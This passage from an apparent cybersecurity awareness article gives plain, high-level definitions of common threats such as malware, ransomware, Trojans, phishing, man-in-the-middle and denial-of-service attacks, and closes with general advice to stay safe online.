Protecting yourself from a phishing scam is possible; all you need to be is vigilant and follow the guidelines mentioned above to enjoy a productive and stress-free time on the internet.

Understanding the Types of Cyber Threats – A Brief Summary

The digital world is expanding, and so are the cyber threats that come with it. There are many online risks, from network intrusions and privacy violations to phishing and malware attacks. Consequently, no one, not even the most well-heeled companies or the most technologically superior titans, is shielded from these cyber threats.

Simply put, cyber or cybersecurity threats are deliberate attempts to damage, steal, or disrupt digital life in some way. DoS attacks, computer viruses, data breaches are some of the most common types of cyber-attacks that you would have heard of. For organizations, regulatory fines, litigations, reputational harm, and disruptions to business continuity are all potential consequences of cyberattacks, in addition to massive financial losses. Today, individuals and enterprises are always at the risk of losing their confidential information and vital assets to cybercriminals who continue to use increasingly sophisticated technologies.

Despite the fact that the number and variety of cyber threats are always mounting, there are a few that modern businesses should be mindful of. The most common types include:

– Malware: Malware is computer software that performs harmful actions on a network or a device, such as corrupting information or gaining unauthorized access to a system

– Ransomware: Malware known as ‘ransomware’ uses encryption to hold a victim’s data hostage until a ransom is paid. The cybercriminal demands a ransom to decrypt the databases, files or apps that have been encrypted.

– Data Breaches: A data breach occurs when an unauthorized intruder gains access to secret, sensitive, or otherwise protected information

– Trojans: Malicious software that appears to be legitimate but can take over your computer is called a ‘Trojan’ or ‘Trojan horse’. A Trojan corrupts, destroys, steals, or otherwise damages your data or system. To dupe you, a Trojan disguises itself as harmless.

– Phishing: An email, instant-message, or text-message scam in which an attacker poses as a well-known company or person to obtain personal information such as email passwords or credit card details. Scammers attempt to get access to personal information by sending communications that look legitimate.

– Man in the Middle Attack: A cyber thief can get in between a machine and a server to steal data. This is more like eavesdropping in the digital world.

– Denial-of-Service (DoS) Attack: DoS attacks occur when a hostile actor seeks to disrupt the availability of an asset. Many different kinds of attacks fall under this umbrella category.

A wide range of individuals, sites and circumstances might pose a threat to your cyber safety and security. By adopting robust and proactive countermeasures and evolving security measures faster, people and organizations can become more self-aware in protecting personal and sensitive information. A safe and orderly digital environment necessitates the presence of good cyber security. While you go digital, stay cyber safe!
